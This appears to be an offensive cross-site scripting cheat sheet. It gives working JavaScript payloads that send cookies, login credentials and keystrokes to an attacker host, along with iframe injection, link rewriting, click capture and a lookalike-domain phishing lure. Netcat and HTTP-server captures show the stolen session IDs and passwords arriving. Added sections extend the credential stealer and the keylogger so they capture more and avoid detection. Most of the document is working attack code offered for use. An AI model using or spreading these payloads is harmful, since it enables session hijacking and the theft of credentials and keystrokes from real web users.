Stealing Cookies
Two payloads that send document.cookie to a host we control. The first loads an invisible image and the victim notices nothing; the second navigates the victim's browser to our server, which they will see. Both depend on the session cookie being readable from JavaScript: a cookie set with the HttpOnly flag never appears in document.cookie, so if the capture comes back without the session ID, that is usually why.
<script> new Image().src="http://AttackerIP/bogus.php?output="+document.cookie; </script>
<script>document.location='http://AttackerIP/bogus.php?output='+document.cookie</script>
Start a netcat listener before injecting. When the victim's browser renders the injected page you receive the cookie in the request line (spaces arrive as %20 because the browser percent-encodes them; the semicolons and equals signs pass through unchanged):
# nc -nlvp 80
listening on [any] 80 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.113] 55540
GET /bogus.php?output=PHPSESSID=tvd2ljlt16328t3ej2pqliv5e2;%20LANG=EN_US;%20SINCE=1542307743;%20LIMIT=10;%20DOMAIN=admin HTTP/1.1
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*
Host: 10.10.14.21
Once we have an authorised user's cookie, a Firefox extension such as Cookie Quick Manager or Cookie Editor lets us set the stolen PHPSESSID value in our own browser and use the web app as that user. The server identifies the session by that ID alone, so the stolen value keeps working until the victim logs out or the session expires. Note the User-Agent in the capture above: PhantomJS, a headless browser, which tells us the "admin" visiting the injected page is an automated client rather than a person.
Browser Redirection & IFRAME Injection
A zero-sized iframe pointing at our host is invisible to the victim, but their browser still fetches it:
<iframe SRC="http://AttackerIP/report" height = "0" width ="0"></iframe>
// Once the victim visits the affected output page, their browser connects to our attacking machine:
# nc -nlvp 80
listening on [any] 80 ...
connect to [AttackerIP] from (UNKNOWN) [Victim] 49275
GET /report HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Referer: http://127.0.0.1/index.php
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: AttackerIP
Connection: Keep-Alive
Browser redirection may be used to send a victim browser to a client-side attack or to an information-gathering script. The capture is also worth reading in itself: the Referer header tells us which page on the target renders our injected iframe, and the User-Agent identifies the victim's browser and OS (here Internet Explorer 8 on Windows 7), which is exactly what a client-side attack needs to be chosen.
Modifying HTML
- Changing the first h1 heading of the target page to New Title (the script selects the first h1 element, not the document title):
<script>
document.getElementsByTagName("h1")[0].innerHTML = "New Title";
</script>
Changing Links
- Changing all links on the target page to point to our attacking host, which serves up the malicious file evil.txt:
<script>
var links = document.getElementsByTagName("a");
for (var i = 0; i < links.length; i++)
{
links[i].href = "http://AttackerIP/evil.txt";
}
</script>
Form Submission Hijacking
For the username and password variables we select the first form on the page, document.forms[0], and then its first and second elements: elements[0] is the username input field and elements[1] the password input field. Whatever the victim types into those fields is assigned to the respective variable. When the victim submits the form our InterceptForm function runs, because we assigned it with document.forms[0].onsubmit = InterceptForm;. It then sends the captured credentials to our own HTTP server by setting Image().src to a URL on that server. InterceptForm returns nothing, so the real submission still goes ahead and the victim logs in normally. Two things to check before relying on the element indices: a hidden CSRF token or other field placed before the username shifts them, and a password containing & or = breaks the query string unless it is passed through encodeURIComponent().
<script>
function InterceptForm()
{
var username = document.forms[0].elements[0].value;
var password = document.forms[0].elements[1].value;
new Image().src = "http://AttackerIP/?username="+username+"&password="+password;
}
document.forms[0].onsubmit = InterceptForm;
</script>
root@kali:~# python -m SimpleHTTPServer 80
// Receive the credentials from our JavaScript payload (on Python 3 the equivalent is python3 -m http.server 80)
... "GET /?username=victim&password=Sup3rSecP@ssw0rd HTTP/1.1" 200 -
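As an added example, not part of the original post, the same interception written so it does not depend on elements[0] and elements[1]: it walks every named field in the form (so a hidden CSRF token in front of the username is captured as what it is rather than mistaken for the username), URL-encodes the values, and hooks the form with addEventListener so any onsubmit handler the application assigned stays in place. The collection and encoding logic makes no DOM calls, so it can be run against a constructed form object outside a browser; hijackForm is what the injected script would call with document.forms[0]. The host 10.10.14.21, the sample form and its field names are assumptions.

```javascript
// Added example, not from the original page. Attacker host and the sample
// form are constructed for illustration.

// Collect name=value pairs from anything that has a .elements collection
// (a real HTMLFormElement or the stub below). Buttons carry no user input and
// unchecked boxes would not be submitted, so both are skipped.
function collectFormFields(form) {
  const fields = {};
  for (const el of Array.from(form.elements)) {
    if (!el.name || el.type === 'submit' || el.type === 'button') continue;
    if ((el.type === 'checkbox' || el.type === 'radio') && !el.checked) continue;
    fields[el.name] = el.value;
  }
  return fields;
}

// Beacon URL. encodeURIComponent() stops '&', '=' or '#' inside a password
// from being parsed as query-string structure on our side.
function buildBeaconUrl(base, fields) {
  const query = Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
  return base + '?' + query;
}

// Hook the form. addEventListener leaves any existing form.onsubmit intact,
// and returning nothing lets the real submission proceed. makeImage defaults
// to the browser's Image constructor and is injectable so the code can be
// exercised outside a browser.
function hijackForm(form, base, makeImage) {
  const factory = makeImage || (() => new Image());
  form.addEventListener('submit', () => {
    factory().src = buildBeaconUrl(base, collectFormFields(form));
  });
}

// Constructed stand-in for document.forms[0] on a login page whose first
// element is a hidden CSRF token: the elements[0]/[1] payload above would
// have exfiltrated the token as the "username" and the username as the "password".
function makeSampleForm() {
  return {
    elements: [
      { name: 'csrf_token', type: 'hidden', value: 'a1b2c3' },
      { name: 'username', type: 'text', value: 'victim' },
      { name: 'password', type: 'password', value: 'Sup3r&Sec=P@ss#' },
      { name: 'remember', type: 'checkbox', checked: false, value: '1' },
      { name: '', type: 'submit', value: 'Login' },
    ],
    handlers: [],
    addEventListener(type, fn) { this.handlers.push({ type, fn }); },
    submit() { this.handlers.forEach(h => { if (h.type === 'submit') h.fn({}); }); },
  };
}

// Hook the sample form, "submit" it, and return the beacon URLs that were sent.
function demoHijack() {
  const sent = [];
  const form = makeSampleForm();
  hijackForm(form, 'http://10.10.14.21/', () => ({ set src(v) { sent.push(v); } }));
  form.submit();
  return sent;
}
```

In the injected payload the call is simply hijackForm(document.forms[0], "http://AttackerIP/"); the third argument is only needed when running the logic without a browser, as demoHijack does.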
Social Engineering
First we create an h2 element whose heading text states Website Under Construction. Secondly, we create an h3 element holding our malicious redirect text, Please visit SuperSecureCompany.com; clicking it sends the victim to a domain, and a file, under our control. We want the domain we actually link to (SuperSecComp.com in the code below) to look as close to the target's domain as possible, so the victim believes the site is legitimately down and follows our link. Lastly we append the h2 and h3 elements to the parent of the login form and remove the form that was there originally.
<script>
var input = document.createElement("h2");
input.innerHTML = "Website Under Construction"
var link = document.createElement("h3");
link.innerHTML = "Please visit" + " SuperSecureCompany.com".link('http://SuperSecComp.com/evil.txt');
document.forms[0].parentNode.appendChild(input);
document.forms[0].parentNode.appendChild(link);
document.forms[0].parentNode.removeChild(document.forms[0]);
</script>
Before injection:
After injection:
Capturing Clicks
We declare a function CaughtClick that navigates to our malicious URL, then add an EventListener for click events to the document body. If the victim clicks anywhere on the page whilst browsing the target site, the listener catches the click and runs CaughtClick, sending the victim to a site under our control. The third argument, true, registers the listener for the capture phase, so it runs before any click handler the page itself attached to the clicked element.
<script>
function CaughtClick()
{
location.href = "http://AttackerIP/evil.txt";
}
document.body.addEventListener('click', CaughtClick, true);
</script>
Keylogging
We assign the onkeypress event to our KeyLog function. The browser passes the event object to KeyLog as the input argument; input.which holds the Unicode code of the key the victim pressed, which String.fromCharCode() converts into a character stored in key_pressed. Finally, we send each key_pressed value to our Python SimpleHTTPServer using Image().src. Two limitations are visible in the capture below: the keystroke is not URL-encoded, so the space in victim Password arrives as an empty request (GET /? HTTP/1.1), and one request per keystroke is easy to spot in the target's proxy or network logs. The keypress event and the which property are also deprecated; keydown with event.key is the current equivalent.
<script>
document.onkeypress = function KeyLog(input)
{
key_pressed = String.fromCharCode(input.which);
new Image().src = "http://AttackerIP/?"+key_pressed;
}
</script>
root@kali:~# python -m SimpleHTTPServer 80
// Receive the keystrokes from our JavaScript payload
... "GET /?v HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?c HTTP/1.1" 200 -
... "GET /?t HTTP/1.1" 200 -
... "GET /?i HTTP/1.1" 200 -
... "GET /?m HTTP/1.1" 200 -
... "GET /? HTTP/1.1" 200 -
... "GET /?P HTTP/1.1" 200 -
... "GET /?a HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?s HTTP/1.1" 200 -
... "GET /?w HTTP/1.1" 200 -
... "GET /?o HTTP/1.1" 200 -
... "GET /?r HTTP/1.1" 200 -
... "GET /?d HTTP/1.1" 200 -
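As an added example (not from the original post), the keylogger reworked to address the limitations noted above: it listens for keydown, reads event.key, buffers keystrokes and sends them in URL-encoded batches every couple of seconds and on page unload, so spaces and Enter survive and the target's logs show a handful of requests instead of one per key. The buffering is separated from the DOM so it can be run against constructed events outside a browser; installKeylogger is the browser wiring. The host 10.10.14.21, the /k path and the typed sample are assumptions.

```javascript
// Added example, not from the original page. Host, path and the sample
// keystrokes are constructed for illustration.

// Keys that change nothing on their own; logging them only adds noise.
const MODIFIER_KEYS = new Set(['Shift', 'Control', 'Alt', 'Meta', 'CapsLock']);

// Turn a KeyboardEvent-like object into a loggable token: printable keys as
// themselves, everything else (Enter, Backspace, Tab) in brackets.
function keyToken(ev) {
  if (typeof ev.key !== 'string' || MODIFIER_KEYS.has(ev.key)) return '';
  return ev.key.length === 1 ? ev.key : '[' + ev.key + ']';
}

// Accumulates keystrokes and ships them in one request per flush.
class KeyBuffer {
  constructor(base, send) {
    this.base = base;   // e.g. 'http://AttackerIP/k'
    this.send = send;   // function(url); in a browser: url => { new Image().src = url; }
    this.buf = '';
  }
  push(ev) { this.buf += keyToken(ev); }
  // Send whatever has accumulated. Returns the URL used, or null if nothing was pending.
  flush() {
    if (!this.buf) return null;
    const url = this.base + '?k=' + encodeURIComponent(this.buf);
    this.buf = '';
    this.send(url);
    return url;
  }
}

// Browser wiring: capture-phase keydown listener, periodic flush, and a final
// flush when the victim navigates away. Call as installKeylogger(document, window, base).
function installKeylogger(doc, win, base) {
  const kb = new KeyBuffer(base, url => { new win.Image().src = url; });
  doc.addEventListener('keydown', ev => kb.push(ev), true);
  win.setInterval(() => kb.flush(), 2000);
  win.addEventListener('beforeunload', () => kb.flush());
  return kb;
}

// Constructed sample: the victim types "victim Pass", holding Shift for the
// capital, then presses Enter. Returns the list of URLs that would be requested.
function demoKeylog() {
  const sent = [];
  const kb = new KeyBuffer('http://10.10.14.21/k', url => sent.push(url));
  const typed = ['v', 'i', 'c', 't', 'i', 'm', ' ', 'Shift', 'P', 'a', 's', 's', 'Enter'];
  for (const key of typed) kb.push({ key });
  kb.flush();
  kb.flush();   // nothing pending, so no second request
  return sent;
}
```

The single request carries victim%20Pass%5BEnter%5D, which the server decodes back to victim Pass[Enter]; the space the original payload lost is preserved, and the Enter marks where the password field ended.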